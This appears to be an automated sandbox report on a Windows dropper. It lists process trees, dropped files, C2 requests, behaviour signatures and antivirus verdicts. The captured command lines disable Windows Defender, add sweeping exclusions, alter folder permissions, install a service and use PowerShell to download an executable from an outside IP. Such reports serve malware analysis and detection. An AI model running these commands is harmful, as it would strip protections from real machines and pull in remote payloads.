Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | June 19, 2023, 5:07 p.m. | June 19, 2023, 5:11 p.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2768 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
2908 -
1.exe "C:\programdata\1.exe" /D
3032 -
-
-
chcp.com chcp 65001
2256 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "
2376 -
findstr.exe findstr /i "Platform"
2488 -
powershell.exe powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
2628 -
find.exe find /I /N "Superfetch.exe"
1080 -
tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
2788 -
takeown.exe takeown /f c:\windows\tasks
2412 -
timeout.exe TIMEOUT /T 3 /NOBREAK
3012 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
2116 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
2672 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
1404 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
2272 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)"
2504 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)"
2616 -
icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
2744 -
timeout.exe TIMEOUT /T 3 /NOBREAK
2832 -
-
-
timeout.exe TIMEOUT /T 1 /NOBREAK
2720 -
Wmiic.exe "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
2064 -
timeout.exe TIMEOUT /T 1 /NOBREAK
1576 -
Wmiic.exe "C:\windows\tasks\wmiic" start WMService
2820 -
timeout.exe TIMEOUT /T 2 /NOBREAK
2944 -
-
net1.exe C:\Windows\system32\net1 start WMService
2852
-
-
-
-
timeout.exe TIMEOUT /T 3 /NOBREAK
2068 -
powershell.exe powershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/any.exe','c:\windows\migration\any.exe')"
2316 -
timeout.exe TIMEOUT /T 3 /NOBREAK
2996 -
timeout.exe TIMEOUT /T 10 /NOBREAK
1400 -
tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
452 -
find.exe find /I /N "Superfetch.exe"
1632
-
-
-
-
dc.exe "C:\programdata\dc.exe"
2988
-
-
Suricata Alerts
Suricata TLS
No Suricata TLS
pdb_path | D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb |
section | .gfids |
resource name | PNG |
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://185.213.208.196:8080/client/setClientConfig?clientId=test22-PC | ||||||
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://185.213.208.196:8080/client/setClientStatus?clientId=test22-PC |
request | POST http://185.213.208.196:8080/client/setClientConfig?clientId=test22-PC |
request | POST http://185.213.208.196:8080/client/setClientStatus?clientId=test22-PC |
request | POST http://185.213.208.196:8080/client/setClientConfig?clientId=test22-PC |
request | POST http://185.213.208.196:8080/client/setClientStatus?clientId=test22-PC |
file | C:\Users\test22\AppData\Local\Temp\_MEI8002\libcrypto-1_1.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI8002\python3.dll |
file | C:\Windows\Tasks\MSTask.exe |
file | C:\Windows\Tasks\IntelConfigService.exe |
file | C:\ProgramData\1.exe |
file | C:\Users\test22\AppData\Local\Temp\_MEI8002\pywin32_system32\pythoncom310.dll |
file | C:\Windows\Tasks\Wmiic.exe |
file | C:\Windows\Tasks\run.bat |
file | C:\ProgramData\curl.exe |
file | C:\Users\test22\AppData\Local\Temp\_MEI8002\pywin32_system32\pywintypes310.dll |
file | C:\Windows\Tasks\ApplicationsFrameHost.exe |
file | C:\ProgramData\dc.exe |
file | C:\Users\test22\AppData\Local\Temp\_MEI8002\python310.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI8002\VCRUNTIME140.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI8002\libssl-1_1.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI8002\libffi-7.dll |
file | C:\ProgramData\migrate.exe |
file | C:\Users\test22\AppData\Local\Temp\_MEI8002\mfc140u.dll |
file | C:\Windows\Tasks\Wrap.exe |
file | C:\ProgramData\st.bat |
file | C:\ProgramData\ru.bat |
file | C:\Windows\Tasks\Superfetch.exe |
file | C:\Users\test22\AppData\Local\Temp\_MEI8002\VCRUNTIME140_1.dll |
file | C:\ProgramData\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" " |
cmdline | powershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/any.exe','c:\windows\migration\any.exe')" |
cmdline | powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\ |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\ |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true |
cmdline | powershell Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\ |
cmdline | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
cmdline | C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat" |
file | C:\Windows\Tasks\Wmiic.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SUPERFETCH.EXE' |
section | {u'size_of_data': u'0x0000e200', u'virtual_address': u'0x00062000', u'entropy': 6.803785215984442, u'name': u'.rsrc', u'virtual_size': u'0x0000e020'} | entropy | 6.80378521598 | description | A section with a high entropy has been found |
process | 1.exe |
description | Create a windows service | rule | Create_Service | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active |
cmdline | tasklist /FI "IMAGENAME eq Superfetch.exe" |
cmdline | net start WMService |
cmdline | chcp 65001 |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" " |
host | 185.213.208.196 |
service_name | WMService | service_path | C:\Windows\Tasks\Wmiic.exe | ||||||
file | C:\Windows\Tasks\run.bat | ||||||||
file | C:\Windows\Tasks\WinRing0x64.sys | ||||||||
file | C:\Windows\Tasks\MSTask.exe | ||||||||
file | C:\Windows\Tasks\IntelConfigService.exe | ||||||||
file | C:\Windows\Tasks\config.json | ||||||||
file | C:\Windows\Tasks\Wrap.exe | ||||||||
file | C:\Windows\Tasks\ApplicationsFrameHost.exe | ||||||||
file | C:\Windows\Tasks\Superfetch.exe | ||||||||
file | C:\Windows\Tasks\Wmiic.exe |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)" |
value | Uses powershell to execute a file download from the command line |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
file | c:\Windows\migration\any.exe |
service | WinDefend (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start) |
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware | ||||||
description | attempts to disable windows defender | registry | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start |
Bkav | W32.AIDetectMalware |
Elastic | malicious (moderate confidence) |
MicroWorld-eScan | Trojan.Uztuby.36 |
CAT-QuickHeal | Script.Trojan.A7528069 |
ALYac | Trojan.Generic.33714818 |
Malwarebytes | Generic.Malware.Agent.DDS |
VIPRE | Trojan.Uztuby.36 |
K7AntiVirus | Riskware ( 0040eff71 ) |
K7GW | Riskware ( 0040eff71 ) |
Cybereason | malicious.312007 |
Cyren | W32/S-e021834d!Eldorado |
ESET-NOD32 | multiple detections |
Kaspersky | HEUR:Trojan-Downloader.BAT.Agent.gen |
BitDefender | Trojan.Uztuby.36 |
Avast | FileRepMalware [Misc] |
Rising | Trojan.Generic@AI.95 (RDML:6L994tX1hscVcOS+AaxsYQ) |
Sophos | BlueLife Windows Defender Control (PUA) |
F-Secure | Trojan.TR/ClipBanker.munvo |
DrWeb | BAT.Siggen.196 |
TrendMicro | HackTool.Win32.DefenderControl.AA |
McAfee-GW-Edition | RDN/Generic PUP.z |
FireEye | Generic.mg.46f330a312007fc9 |
Emsisoft | Trojan.Uztuby.36 (B) |
Avira | TR/ClipBanker.munvo |
MAX | malware (ai score=87) |
Antiy-AVL | Trojan[Downloader]/JS.Agent.dv |
Microsoft | HackTool:Win32/Defendercontrol.A |
Xcitium | ApplicUnwnt@#1y78js06n91ja |
Arcabit | Trojan.Uztuby.36 [many] |
ZoneAlarm | HEUR:Trojan-Downloader.BAT.Agent.gen |
GData | Trojan.Uztuby.36 |
Cynet | Malicious (score: 99) |
VBA32 | Trojan.Zpevdo |
TrendMicro-HouseCall | HackTool.Win32.DefenderControl.AA |
MaxSecure | Trojan.Malware.121218.susgen |
Fortinet | Riskware/DefenderControl |
AVG | FileRepMalware [Misc] |
DeepInstinct | MALICIOUS |